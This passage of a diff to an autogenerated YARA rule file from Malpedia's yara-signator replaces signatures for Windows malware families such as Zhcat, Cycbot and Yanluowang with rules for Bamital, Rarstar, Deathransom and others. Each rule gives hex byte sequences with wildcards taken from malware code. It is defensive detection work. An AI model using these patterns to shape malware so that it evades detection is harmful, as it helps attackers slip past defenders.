740e 50 e8???????? 83a6808e410000 59 } + $sequence_15 = { 83e801 0f8580000000 8b4508 dd00 ebc6 c745e0285b4100 e9???????? } condition: - 7 of them and filesize <33792 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Zhcat_Auto : FILE +rule MALPEDIA_Win_Bamital_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0ba2d083-15f8-52b3-8a0e-523b48182ccb" + id = "3baca492-b609-5d4f-80bb-c68e186e995b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zhcat_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bamital_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "42a0cd82873743b61553ad212467ec7353604cc191810d2e10195e3fc58baf2d" + logic_hash = "80aaa696b23b77db92b802971fab9d7fd90e414992e8440ec6c57f40448ba374" score = 75 quality = 75 tags = "FILE" @@ -172951,32 +175671,32 @@ rule MALPEDIA_Win_Zhcat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b3d???????? 8b7508 4f 8945fc } - $sequence_1 = { 741e 8d45f8 8975f8 50 85ff 750a } - $sequence_2 = { 85c9 759e 56 e8???????? 59 } - $sequence_3 = { 85c9 759e 56 e8???????? 59 5f 5e } - $sequence_4 = { 3c74 7404 3c54 7512 8915???????? eb0a } - $sequence_5 = { 68???????? 56 56 897004 ffd3 6aff } - $sequence_6 = { ff7508 ff15???????? ff7514 8945e4 8bc7 668945f0 ffd6 } - $sequence_7 = { eb28 c705????????02000000 eb1c c605????????01 } - $sequence_8 = { 0fb63e 0fb6c0 eb12 8b45e0 8a80044a4100 08443b1d 0fb64601 } - $sequence_9 = { ff7508 ff15???????? 57 8bf0 e8???????? 59 5f } + $sequence_0 = { eb05 83c001 ebe0 52 ff75fc e8???????? } + $sequence_1 = { 8ac4 8807 83c701 e2d8 c9 c20800 55 } + $sequence_2 = { ff75dc ff75d4 57 e8???????? 8b55fc 8945fc 0bd2 } + $sequence_3 = { e8???????? 8b55fc 8945fc 0bd2 } + $sequence_4 = { 0bc0 741f 50 83c001 50 } + $sequence_5 = { b800000000 c9 c20400 55 8bec 83c4f0 } + $sequence_6 = { 56 57 53 8b5d0c 8b7508 } + $sequence_7 = { ff7508 ff75f4 e8???????? 68e8070000 } + $sequence_8 = { 6a28 e8???????? 8945fc ff7508 e8???????? 8945f8 e8???????? } + $sequence_9 = { 8a07 3c39 7208 3c7e 7704 2c19 eb13 } condition: - 7 of them and filesize <376832 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Cycbot_Auto : FILE +rule MALPEDIA_Win_Rarstar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "86cbdc6e-7fe8-5962-82c9-3bfe759d3962" + id = "1b0cea37-0a1d-5e66-91fc-944e4e50541c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cycbot_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rarstar_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "0df38e9a7bf0b18ae5c795f617ec217aef7020970864c9cdbebdcaf5c85c3174" + logic_hash = "2e522865d24e8dea587d8aa292c78791c9371361cc03d604920c80f6d8c9bb83" score = 75 quality = 75 tags = "FILE" @@ -172990,32 +175710,32 @@ rule MALPEDIA_Win_Cycbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 8b45ec e8???????? c3 6834020000 b8???????? e8???????? } - $sequence_1 = { 57 ffb5e8feffff ff15???????? 8bb5ecfeffff 2bf3 f7de 1bf6 } - $sequence_2 = { c745dc44eb4300 c745e08ceb4300 c745e40cee4300 c745e820ee4300 c745ec34ee4300 c745f0f4ec4300 c745f4fcec4300 } - $sequence_3 = { 8b06 8b4008 89480c 8b06 894808 8b4508 8908 } - $sequence_4 = { 59 33c0 8d7dc8 f3ab aa 8d45c8 6a21 } - $sequence_5 = { 33c0 8903 894304 57 894308 ff15???????? c70300000000 } - $sequence_6 = { 8d854cfbffff 50 8bc7 e8???????? 59 59 57 } - $sequence_7 = { ff5108 8d85e0fbffff 50 ff15???????? ff85d8fbffff 39bdb4fbffff } - $sequence_8 = { 50 e8???????? 837c241801 59 59 7408 c744241807000000 } - $sequence_9 = { b90a0a0000 663b4c07fe 7508 8945fc be01000000 40 } + $sequence_0 = { 8a5e01 83e203 c1fb04 c1e204 } + $sequence_1 = { 33d2 b903000000 f7f1 83c408 8bc6 } + $sequence_2 = { 85ed 7e6f 8a143e 83c703 c1fa02 83e23f 41 } + $sequence_3 = { 0f84c1010000 8b2d???????? 8b4c2434 8b54241c 6a00 } + $sequence_4 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 25ff000080 } + $sequence_5 = { ffd6 8d84241c020000 68???????? 50 ffd6 8d8c2424040000 68???????? } + $sequence_6 = { 8d8c2420030000 51 52 ffd5 8d842418010000 68???????? } + $sequence_7 = { 899c242c030000 899c2428030000 899c2424030000 899c2420030000 bf???????? 83c9ff } + $sequence_8 = { f7d1 2bf9 899c2430030000 8bc1 8bf7 8bfa } + $sequence_9 = { 8a9405ecfdffff 8890a0d74000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff } condition: - 7 of them and filesize <1163264 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Hlux_Auto : FILE +rule MALPEDIA_Win_Nightclub_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0554b2ef-0799-5994-8001-d3a987727985" + id = "fe7b22ba-512f-5e91-8935-479f32d64f06" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hlux_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nightclub_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "53ff7358e541a46f4d140f6dc71959f0fd15f8b04731bebe36051fa435d4979d" + logic_hash = "3d19b2fe0d45f47ba38d0f6076660c3269a68cbecd47ee885f31f66a44204ee7" score = 75 quality = 75 tags = "FILE" @@ -173029,38 +175749,32 @@ rule MALPEDIA_Win_Hlux_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81f949e2a499 750b 83f90e 7406 } - $sequence_1 = { 0101 c9 c3 6a10 } - $sequence_2 = { 0009 1b4e01 e405 9d } - $sequence_3 = { 0088aa4b0023 d18a0688078a 46 018847018a46 } - $sequence_4 = { 0130 8b13 8b08 85d2 } - $sequence_5 = { b8e3062de4 09c0 7506 898550ffffff 8b8550ffffff ba205af5bb } - $sequence_6 = { 7545 8945fc 8b45f0 895de8 81f97a701028 7534 } - $sequence_7 = { 0104b9 33c9 83c408 85c0 } - $sequence_8 = { 010f 840f 0000 008365f0fe8b } - $sequence_9 = { 8b0d???????? 85c9 753f 83f963 753a 8945fc 83f93f } - $sequence_10 = { 0104bb 8d1447 89542418 e9???????? } - $sequence_11 = { 895de8 33f6 8955cc 83fe13 7503 8975fc 5e } - $sequence_12 = { 0000 008365f0fe8b 4d 0883c108e918 } - $sequence_13 = { 8945e0 83f9f3 7507 09c9 7403 } - $sequence_14 = { 81fb2e5ca766 7503 895de8 8945d4 } - $sequence_15 = { 83fbd5 7413 33c0 83f827 7403 } + $sequence_0 = { ff4808 83c404 3b7514 75b4 5f 5b 8b450c } + $sequence_1 = { 8d4dd0 c645f300 ff15???????? 8b4d08 8d45c0 50 51 } + $sequence_2 = { 8d75bc e8???????? 8d75e0 e8???????? eb33 8b55bc 8b7d08 } + $sequence_3 = { 8da42400000000 8a4701 47 84c0 75f8 b90b000000 be???????? } + $sequence_4 = { 83c404 6a00 56 53 8bf8 ff15???????? } + $sequence_5 = { 85c0 7505 a1???????? 8bc8 8bff 8a10 40 } + $sequence_6 = { 83c408 8bc8 ff15???????? 5f 5e 8be5 5d } + $sequence_7 = { 5b b87fe0077e f7ef c1fa08 8bfa c1ef1f 03fa } + $sequence_8 = { 8b45f0 83c010 83c310 8945f0 3bc6 75dc } + $sequence_9 = { c645f200 ff15???????? c745e001000000 85db 0f848c010000 8b15???????? 8b450c } condition: - 7 of them and filesize <3147776 + 7 of them and filesize <247808 } -rule MALPEDIA_Win_Dnschanger_Auto : FILE +rule MALPEDIA_Win_Tapaoux_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ae807a62-5d4f-55b1-a240-1c49a1caed44" + id = "68d778fd-5462-5b8a-898a-2fe57f5f9d68" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnschanger_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tapaoux_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "6d81d999d3cf2fb8d24f1a3cbe10fc2c3244404cd2fbc45cfa8a36930b442d5e" + logic_hash = "f82a0c342c816d1880cfb31489fc94204aa3933a5341062512dc21730819514f" score = 75 quality = 75 tags = "FILE" @@ -173074,32 +175788,32 @@ rule MALPEDIA_Win_Dnschanger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8bf0 8b442414 6800010000 } - $sequence_1 = { b301 57 ff15???????? 85f6 740c 56 6a00 } - $sequence_2 = { 8bc2 03c7 eb02 8bc7 5f } - $sequence_3 = { be04000000 5f 8bc6 5e 81c494000000 } - $sequence_4 = { ff7508 66ab aa ff15???????? } - $sequence_5 = { 8b542408 53 8a1a 8819 41 42 84db } - $sequence_6 = { 3b0e 72f2 57 57 57 } - $sequence_7 = { 57 57 56 57 ff75fc ff15???????? } - $sequence_8 = { 5e 81c494000000 c3 83f806 } - $sequence_9 = { f3aa 8bc6 5f 5e c3 } + $sequence_0 = { 83c404 8d9424d0020000 33f6 52 55 ffd3 85c0 } + $sequence_1 = { f7d1 49 8d7c2454 894c2418 83c9ff f2ae f7d1 } + $sequence_2 = { 52 50 8d4c2420 68???????? 51 eb49 b900010000 } + $sequence_3 = { 68???????? 52 ffd6 8d44245c 68???????? 50 } + $sequence_4 = { 8be8 83fdff 0f84b0000000 8b3d???????? } + $sequence_5 = { 83c404 8d4c2414 50 51 e8???????? 8d54241c } + $sequence_6 = { 8d442408 55 50 8d8c241c040000 6800040000 51 56 } + $sequence_7 = { c3 8d442408 8d4c240c 50 53 53 } + $sequence_8 = { 68???????? 50 e8???????? 8b07 83c418 85c0 7526 } + $sequence_9 = { aa 8bb424200c0000 b900010000 33c0 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Metastealer_Auto : FILE +rule MALPEDIA_Win_Httpdropper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cdc28210-4a73-5ebc-92c2-e9cca60e6ba0" + id = "eb6cb470-4fa5-55f1-aaf4-34eabe7782e1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.metastealer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpdropper_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "6d21821c6e275cca2327e10c362ceb42915cf515b000f17d28567b39e609820e" + logic_hash = "c6973c071283bf0dc986d288edaa8567196f172f5da7a23c655925f94d3c03cb" score = 75 quality = 75 tags = "FILE" @@ -173113,32 +175827,38 @@ rule MALPEDIA_Win_Metastealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7710 50 e8???????? 8b4718 8d4b1c 894318 8d471c } - $sequence_1 = { 8b4220 894620 8d4228 894224 897a20 c70700000000 8bc6 } - $sequence_2 = { 8d4dd8 e8???????? c745fc00000000 8d45d8 68a3000000 68???????? 68???????? } - $sequence_3 = { 8b4104 894610 8b4104 8b400c 85c0 740c 89460c } - $sequence_4 = { eb0a c70600000000 c6460401 8a45ae 8b7d9c 8845af 660f1f440000 } - $sequence_5 = { eb0e 0f57c0 660f1345d4 8b7dd8 8b75d4 51 8d4dd4 } - $sequence_6 = { ff7314 68???????? 56 e8???????? 68???????? 56 e8???????? } - $sequence_7 = { ffd0 83c40c 85c0 7407 be01000000 eb02 33f6 } - $sequence_8 = { d945fc 5e 8be5 5d c3 8d8100000038 0bc6 } - $sequence_9 = { c7411000000000 c7411400000000 837e1408 8975d0 7205 8b16 8955d0 } + $sequence_0 = { 8d4c243c 51 8d54241c 52 53 } + $sequence_1 = { 51 6a00 6a00 68???????? 52 c745f404000000 } + $sequence_2 = { 7506 c60100 49 ebec 8bc3 } + $sequence_3 = { e8???????? 6804010000 8d95edfdffff 6a00 52 c685ecfdffff00 } + $sequence_4 = { 7414 57 c6470300 e8???????? 83c404 } + $sequence_5 = { 51 8d95ecf8ffff 68???????? 52 e8???????? 8d85f4fdffff } + $sequence_6 = { 6802000080 ff15???????? 8b85d8fbffff 8d8ddcfbffff 51 } + $sequence_7 = { c685d4f4ffff00 e8???????? 57 68ff030000 } + $sequence_8 = { 33c0 ba01000000 f2ae 448bc2 48f7d1 48ffc9 } + $sequence_9 = { 48c7c102000080 4889442438 48897c2430 c74424283f000f00 897c2420 } + $sequence_10 = { 33d2 41b804010000 c68424f000000000 e8???????? 488d15520f0200 488d8c24f0000000 } + $sequence_11 = { 488bfb 488d73ff f2ae 48f7d1 48ffc9 } + $sequence_12 = { 0fb7cd 4889442428 6689742428 4889442430 ff15???????? 488bcf } + $sequence_13 = { e8???????? 488d8d81040000 33d2 41b87f0c0000 } + $sequence_14 = { c1e808 418bd1 4032c7 4a0fbebc35da020000 81e2fdff0000 } + $sequence_15 = { 488d4df0 e8???????? b801000000 e9???????? } condition: - 7 of them and filesize <26230784 + 7 of them and filesize <524288 } -rule MALPEDIA_Win_Bart_Auto : FILE +rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1691d219-2287-5770-a9af-369cb19fd25c" + id = "2c8bb8d3-c4a4-59f1-99cf-04925e102b6b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bart_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cur1_downloader_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "20a38c1c6b8b98b8d85839077c1f03f4679fb05ea3fd09bb3acf392b4f9ee60a" + logic_hash = "b5443d6c58a9050bf16869865e319c3a21a1ce3b38679342db8dce71a1fd94bc" score = 75 quality = 75 tags = "FILE" @@ -173152,32 +175872,32 @@ rule MALPEDIA_Win_Bart_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b0483 3bd0 772e 7205 80c1ff 79e8 33c9 } - $sequence_1 = { 8b0433 03c2 03c1 3bc2 7404 1bc9 } - $sequence_2 = { 8a18 894dd0 8955c8 8945cc 57 85f6 } - $sequence_3 = { 660fd6459c e8???????? 83c410 8d8570ffffff 33c9 ba07000000 } - $sequence_4 = { e8???????? 8b7598 8d4d9c 8b5590 0fb606 } - $sequence_5 = { 8b4485dc d3e8 88043a 0fbed3 3bd6 7cde 8bbd58ffffff } - $sequence_6 = { 7868 8bc8 0fbec2 8b5508 894c2418 8d1482 8a44240e } - $sequence_7 = { 84db 0f8ed3020000 0fb6d3 8bc7 899564ffffff 0b08 8d4004 } - $sequence_8 = { 8bca e8???????? 8b4dfc 83c438 33cd 5f 5e } - $sequence_9 = { 0f88ff000000 8b7df4 83c706 42 } + $sequence_0 = { e8???????? ebd1 488d542440 488b4c2470 e8???????? 8b442438 83c801 } + $sequence_1 = { 8b442440 ffc0 89442440 8b05???????? 39442440 0f83e4000000 8b442440 } + $sequence_2 = { c68424e70200006f c68424e80200006e c68424e902000057 c68424ea02000000 } + $sequence_3 = { 7578 48630d847affff 488d15417affff 4803ca 813950450000 755f b80b020000 } + $sequence_4 = { c68424b803000069 c68424b90300006e c68424ba03000067 c68424bb0300006c c68424bc03000065 c68424bd0300004f } + $sequence_5 = { c684248803000065 c684248903000049 c684248a0300006e c684248b03000066 c684248c0300006f c684248d03000072 c684248e0300006d } + $sequence_6 = { 48c744247000000000 41b918000000 4c8d8424a0000000 488b942488000000 488b8c2490000000 ff15???????? 85c0 } + $sequence_7 = { 4863442450 0fb78444d0000000 83f85c 750d 8b442450 898424a4000000 eb02 } + $sequence_8 = { 7d0c 4863442428 c644042400 ebe3 c744242800000000 eb0a 8b442428 } + $sequence_9 = { c644244933 c644244a37 c644244b62 c644244c34 c644244d37 c644244e39 c644244f32 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <402432 } -rule MALPEDIA_Win_Urausy_Auto : FILE +rule MALPEDIA_Win_Backswap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "42f215cc-3fcb-5d25-8a29-1c5fcfaf0e92" + id = "8b9036c3-1342-5fdd-b202-655dad83c8d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.urausy_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backswap_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "4f1d0bce8598e73699b4a743f6a21ef45b27ed44d43ef0837b1c95c90d3c9c6b" + logic_hash = "a378488e042d6e06f37e68439e6beddf9b3f11fc0a2449d478058f24368f291d" score = 75 quality = 75 tags = "FILE" @@ -173191,32 +175911,32 @@ rule MALPEDIA_Win_Urausy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 68???????? 68???????? ff7508 e8???????? 6a00 ff35???????? } - $sequence_1 = { 8bd3 81c2a5000000 50 53 52 51 } - $sequence_2 = { ff75e4 e8???????? 8945e8 ff35???????? } - $sequence_3 = { 6a01 ff35???????? e8???????? 6a00 68???????? 68???????? } - $sequence_4 = { c21000 55 8bec 81c4ecefffff } - $sequence_5 = { 0f8585000000 6814000000 68???????? 6a04 8d8500fcffff 50 e8???????? } - $sequence_6 = { 8d85dcf7ffff 50 57 56 } - $sequence_7 = { 833d????????00 0f8fae050000 c705????????01000000 ff35???????? 8f45f0 ff35???????? 8f45f4 } - $sequence_8 = { e8???????? ff75fc e8???????? 8b45f8 c9 c20400 ff25???????? } - $sequence_9 = { e8???????? b800000000 c9 c21400 } + $sequence_0 = { 5f 5a 5b c9 c21000 83f0ff 5e } + $sequence_1 = { 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 e9???????? } + $sequence_2 = { 33d2 8bdf 4b eb1c 85c9 } + $sequence_3 = { eb1c 85c9 7508 3bdf 7404 } + $sequence_4 = { ebd4 3c3f 74c4 3c2a 7508 8bdf 897508 } + $sequence_5 = { f366a5 59 5f 5e c9 c20c00 55 } + $sequence_6 = { 74ed 33c0 eb04 8bc6 } + $sequence_7 = { 4b eb1c 85c9 7508 3bdf 7404 8bce } + $sequence_8 = { 83f0ff 5e 5f 5a 5b } + $sequence_9 = { 7482 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Matanbuchus_Auto : FILE +rule MALPEDIA_Win_Deathransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2788ba99-d4a7-56bc-b166-5140402f53be" + id = "4e39de37-0fee-5b21-a4db-fc348269215e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matanbuchus_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deathransom_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "78ecf15a99d40895d657b9372a7af5a206c5b9d4887dbdf8360368c6bcd36a27" + logic_hash = "8362ae87c1f20555b6e75c6240bf76604d10b1d1a7af4c90e341b81be4a45543" score = 75 quality = 75 tags = "FILE" @@ -173230,32 +175950,32 @@ rule MALPEDIA_Win_Matanbuchus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 038c0534fdffff 51 e8???????? ebb4 8b55fc 52 e8???????? } - $sequence_1 = { 6a0c 6a0c 68???????? e8???????? } - $sequence_2 = { 8b4dfc 038c0534fdffff 51 e8???????? } - $sequence_3 = { 8b4df8 8b513c 035508 8955f4 } - $sequence_4 = { 6bc200 8b4d08 0fbe1401 33550c } - $sequence_5 = { 68f8000000 8d95b8feffff 52 8b45fc 0345ec 50 e8???????? } - $sequence_6 = { 8b45f4 c1e818 3345f4 8945f4 694df495e9d15b 894df4 } - $sequence_7 = { 51 8b55f0 52 6b45f828 8b4dfc 038c0534fdffff } - $sequence_8 = { eb44 b901000000 d1e1 8b55ec } - $sequence_9 = { 8b55ec 813a50450000 7407 33c0 e9???????? } + $sequence_0 = { 8b55d8 33c3 03c1 81c216c1a419 03d0 8bcf 0155ec } + $sequence_1 = { 03d1 c1c007 0355a8 8bcf c1c90b 33c8 8955d8 } + $sequence_2 = { 742d 8b45f8 ba20000000 2bd6 8bca d3e8 8bce } + $sequence_3 = { 0f8278010000 8b5df4 8d4dd8 56 8bd3 837b0400 } + $sequence_4 = { c3 83f802 7546 6820020000 6a08 c745fc20020000 ff15???????? } + $sequence_5 = { 8d8d90fdffff e8???????? 8d8d90fdffff e8???????? 8d8d90fdffff e8???????? 6a50 } + $sequence_6 = { 0b7de4 237ddc 8b55f4 0bf8 897de0 8bc6 014de0 } + $sequence_7 = { 8b45dc 8bc8 0155e8 c1c00a } + $sequence_8 = { 85c9 0f95c0 2bc8 33c0 c1e905 } + $sequence_9 = { c1e810 884311 8bc1 c1e808 884312 884b13 8b4f1c } condition: - 7 of them and filesize <2056192 + 7 of them and filesize <133120 } -rule MALPEDIA_Win_Yanluowang_Auto : FILE +rule MALPEDIA_Win_Acbackdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f8b88dbc-f363-5fc7-a947-363c58e30984" + id = "3b37a750-d7e0-5ba6-b796-2dbd4d0ee414" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yanluowang_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acbackdoor_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "6b0c4fbf1cf464112256b7ec1836b8a801dfd07954f33f682759e2bccef6aa82" + logic_hash = "429f71da1516445c35871fa605cbaf3bc00568c9cb40515ab43ec3dc7a2d0a3f" score = 75 quality = 75 tags = "FILE" @@ -173269,34 +175989,34 @@ rule MALPEDIA_Win_Yanluowang_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 c745c8eca14400 c745cc02000000 e8???????? 8d45f8 50 8d8578ffffff } - $sequence_1 = { 7402 8913 8d510c 33ff 85d2 7402 } - $sequence_2 = { 85c1 750c 3bd1 1bd2 23d0 23542430 } - $sequence_3 = { 85c0 7402 8908 8b55d8 8d4804 33d6 85c9 } - $sequence_4 = { 8b048528c44500 6975d007536554 33048d28c04500 8945c0 8b45f8 8b4dc0 c1e808 } - $sequence_5 = { 8b4508 8bd6 33d7 f7d6 } - $sequence_6 = { 83c438 c645fc14 8d8d78eeffff ffb5e8eeffff ffb5b8eeffff ffb5b4eeffff ffb57ceeffff } - $sequence_7 = { 8b01 85c0 0f84cc2b0200 83f808 7d0f 6bc018 } - $sequence_8 = { 84ff 7557 8b95acf5ffff 8bc2 8b8da8f5ffff 2bc1 } - $sequence_9 = { 337dc8 8b4514 85c0 7402 8938 8d7904 33d2 } + $sequence_0 = { ba04000000 e9???????? 8b542448 8b4c244c 8b742440 89542420 894c2424 } + $sequence_1 = { ebbd 8b442440 890424 ff15???????? 83ec04 89c3 83c42c } + $sequence_2 = { c744240c76070000 c7442408???????? c744240404000000 892c24 e8???????? 8b442438 892c24 } + $sequence_3 = { 8b7904 895c2408 894c2404 890424 e8???????? 8b4c243c 0fb64500 } + $sequence_4 = { e8???????? 85c0 7e06 83c414 5b 5e c3 } + $sequence_5 = { e8???????? 8b06 8b5054 85d2 0f8415fdffff 8b4050 85c0 } + $sequence_6 = { c744241087934a00 c744240cc8000000 c7442408???????? c744240401000000 892c24 e8???????? 8b85c4000000 } + $sequence_7 = { 89c8 8b4c2430 31de 8b5c2434 8987d0000000 894f50 895f54 } + $sequence_8 = { e8???????? 8b83c4000000 c783cc00000004000000 c783c800000016000000 c60000 891c24 e8???????? } + $sequence_9 = { e8???????? 8bbc241c020000 8d742434 31db 85ff 7e1e 8b86f0010000 } condition: - 7 of them and filesize <834560 + 7 of them and filesize <1704960 } -rule MALPEDIA_Win_Virlock_Auto : FILE +rule MALPEDIA_Win_Pwnpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a53ad870-36e8-5483-a3c7-250260a5d06b" + id = "abbe2d0a-a645-5f32-9b7c-0253f67ad1b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virlock_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pwnpos_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "2251c81b77f733b642183ccf22ad3a25fb0df2e83278219ff44fcff0baf92b0d" + logic_hash = "7bd328aa33dd14635d4dbb434ca27c66253964455bceaea97af6eb90a2de7f21" score = 75 - quality = 69 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -173308,32 +176028,32 @@ rule MALPEDIA_Win_Virlock_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? e8???????? ff15???????? 61 3bcb 7532 60 } - $sequence_1 = { 9d cde6 81b4e570805c4af32b0cf0 e602 a4 b592 9c } - $sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b } - $sequence_3 = { 81f2???????? 81f35e473bfc 81f308f661fc 81f37dc97000 e8???????? bb8aedf4f9 baf2edecff } - $sequence_4 = { 45 58 58 46 54 4f 53 } - $sequence_5 = { eb07 3106 83c604 ebea 83f901 754a } - $sequence_6 = { 42 4b 4e 53 47 4b 56 } - $sequence_7 = { 44 56 53 49 4f 45 } - $sequence_8 = { 8bf8 90 e9???????? 8807 90 42 90 } - $sequence_9 = { bb53203dfd 3106 83c604 bb975ea4f7 ebb5 83f901 } + $sequence_0 = { 8d8dbcf9ffff 3985b4f9ffff 8b85a0f9ffff 7306 8d85a0f9ffff 51 50 } + $sequence_1 = { 391d???????? 0f84a4000000 8d75d4 e8???????? 68???????? 50 c645fc01 } + $sequence_2 = { 51 c745fc00000000 ffd3 85c0 7507 e8???????? eb0c } + $sequence_3 = { 6800400000 8d8c2494000000 51 ff15???????? 85c0 7526 